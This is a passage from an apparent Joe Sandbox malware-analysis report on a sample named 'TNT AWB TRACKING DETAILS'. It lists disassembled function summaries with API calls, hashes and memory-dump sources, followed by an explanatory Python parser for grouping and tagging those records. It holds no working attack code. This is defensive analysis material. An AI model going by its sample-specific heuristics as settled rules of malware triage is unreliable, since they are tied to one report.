                                                    • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: Library$AddressDirectoryFreeLoadProcSystem
                                                    • String ID: WIN_XPe
                                                    • API String ID: 582185067-3257408948
                                                    • Opcode ID: f93f2b86cdca5f8a01e329626632b8f548a996bca0e23c76fbf08df798cd6ba5
                                                    • Instruction ID: 15f978455347da51225496d4dbc8f8b9240b7e9f2204a1ab350b9ce33ecb7382
                                                    • Opcode Fuzzy Hash: f93f2b86cdca5f8a01e329626632b8f548a996bca0e23c76fbf08df798cd6ba5
                                                    • Instruction Fuzzy Hash: D3F0327180000CDFCB25DBA0CA88BECBBF8BB18315F640095E506A21A0C7318F89FF60
                                                    APIs
                                                    • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00F459AE
                                                    • PostMessageW.USER32(00000000), ref: 00F459B5
                                                      • Part of subcall function 00F25244: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00F252BC
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                    • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: FindMessagePostSleepWindow
                                                    • String ID: Shell_TrayWnd
                                                    • API String ID: 529655941-2988720461
                                                    • Opcode ID: 220f6a033dd415f6b607a3b056be367a51fe61b5757bc5d6767accfcbb093a96
                                                    • Instruction ID: e8919e3654ad300d7ef3aef1b4a5838711b2b92cebf82d9d51afb3ce58470d79
                                                    • Opcode Fuzzy Hash: 220f6a033dd415f6b607a3b056be367a51fe61b5757bc5d6767accfcbb093a96
                                                    • Instruction Fuzzy Hash: 55D0C9357C0315BBE664AB70AC0FF967A14AB15B50F050825B64AAA1D0D9E4A804D655
                                                    APIs
                                                    • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00F4596E
                                                    • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 00F45981
                                                      • Part of subcall function 00F25244: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00F252BC
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                    • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: FindMessagePostSleepWindow
                                                    • String ID: Shell_TrayWnd
                                                    • API String ID: 529655941-2988720461
                                                    • Opcode ID: 6fdb4159e61e7a6da417bd282fdbeb00a145ae4c270771dfa027464d29ed3d06
                                                    • Instruction ID: a992d8d16b0b5de5a45e715719dbcd8f1070467c2799f83c709f0f811649f121
                                                    • Opcode Fuzzy Hash: 6fdb4159e61e7a6da417bd282fdbeb00a145ae4c270771dfa027464d29ed3d06
                                                    • Instruction Fuzzy Hash: D8D0C935784315B7E664AB70AC0FF967A14AB11B50F050825B64EAA1D0D9E49804D654
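The records above are the IDA plugin's per-function summaries: the APIs a function calls (with "Part of subcall function" entries inherited from callees), the strings it references, and the Similarity identifiers (API ID, String ID, API String ID, Opcode ID, fuzzy hashes) used to match functions across samples. Reading them one at a time does not scale, so a practitioner normally parses them. The following Python is an added example, not Joe Sandbox code and not part of this report; its SAMPLE is constructed from abridged copies of records shown above, and the API_TAGS grouping and its tag names are this example's own assumptions rather than Joe Sandbox signature names.

```python
import re
from dataclasses import dataclass, field
from typing import Optional

# Constructed sample: four records in the layout the Joe Sandbox IDA plugin prints on this page
# (abridged copies of records shown above).
SAMPLE = """\
APIs
• InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 00F3222C
• InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 00F32255
Similarity
• API ID: Internet$OpenOption
• String ID: <local>
• API String ID: 942729171-4266983199
APIs
  • Part of subcall function 00EFB314: _memset.LIBCMT ref: 00EFB321
• IsDebuggerPresent.KERNEL32(?,?,?,00EC100A), ref: 00EFB2F4
• OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,00EC100A), ref: 00EFB303
Strings
• ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 00EFB2FE
Similarity
• API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString_memset
• API String ID: 3158253471-631824599
APIs
• FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00F459AE
• PostMessageW.USER32(00000000), ref: 00F459B5
  • Part of subcall function 00F25244: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00F252BC
Similarity
• String ID: Shell_TrayWnd
• API String ID: 529655941-2988720461
APIs
• FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00F4596E
• PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 00F45981
Similarity
• String ID: Shell_TrayWnd
• API String ID: 529655941-2988720461
"""

@dataclass
class ApiCall:
    name: str                         # e.g. IsDebuggerPresent
    module: str                       # e.g. KERNEL32
    args: list                        # argument column as printed; "?" means unresolved
    ref: str                          # call-site address
    subcall_of: Optional[str] = None  # callee address when listed as "Part of subcall function"

@dataclass
class Record:
    apis: list = field(default_factory=list)
    strings: list = field(default_factory=list)
    meta: dict = field(default_factory=dict)  # "API ID", "String ID", "API String ID", ...

SECTIONS = {"APIs", "Strings", "Memory Dump Source", "Joe Sandbox IDA Plugin", "Similarity"}
# "<Name>.<MODULE>(<args>), ref: <addr>", optionally prefixed by the subcall marker
API_RE = re.compile(r"^(?:Part of subcall function ([0-9A-Fa-f]+):\s*)?"
                    r"(\w+)\.([A-Za-z0-9_]+)(?:\((.*)\))?,?\s*ref:\s*([0-9A-Fa-f]+)$")

def parse_records(text: str) -> list:
    """One Record per function; a record starts at every 'APIs' section header."""
    records, rec, section = [], None, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line in SECTIONS:
            if line == "APIs":
                rec = Record()
                records.append(rec)
            section = line
            continue
        if rec is None:
            continue                          # text before the first record
        line = line.lstrip("•").strip()       # the plugin bullets every entry
        if section == "APIs":
            m = API_RE.match(line)
            if m:
                sub, name, module, args, ref = m.groups()
                rec.apis.append(ApiCall(name, module, args.split(",") if args else [], ref, sub))
        elif section == "Strings":
            rec.strings.append(line)
        else:                                 # key/value lines of the remaining sections
            key, _, value = line.partition(": ")
            rec.meta[key] = value
    return records

# Grouping used by this example only (assumed tag names, not Joe Sandbox's signatures).
API_TAGS = {"IsDebuggerPresent": "anti-debug", "OutputDebugStringW": "anti-debug",
            "InternetOpenW": "network", "InternetSetOptionW": "network",
            "FindWindowW": "window-messaging", "PostMessageW": "window-messaging"}

def direct_apis(rec: Record) -> list:
    """APIs the function calls itself; subcall entries are inherited context, not its own calls."""
    return [c.name for c in rec.apis if c.subcall_of is None]

def tag_record(rec: Record) -> set:
    return {API_TAGS[n] for n in direct_apis(rec) if n in API_TAGS}

def find_duplicates(records: list) -> dict:
    """Group records that share an 'API String ID' (same API set and same strings)."""
    groups = {}
    for rec in records:
        groups.setdefault(rec.meta.get("API String ID"), []).append(rec)
    return {k: v for k, v in groups.items() if k and len(v) > 1}
```

Run over a whole section, parse_records yields one Record per function and find_duplicates collapses functions that share an API String ID (here the two Shell_TrayWnd records), so each distinct signature is reviewed once. Keeping a function's own calls apart from its "Part of subcall function" entries matters when tagging: the IsDebuggerPresent plus OutputDebugStringW pair on the "Unable to initialize critical section in CAtlBaseModule" string is the stock ATL CAtlBaseModule constructor, which is why a bare "checks IsDebuggerPresent" signature should be weighed against the packer- and injection-related findings in the report rather than read as bespoke evasion.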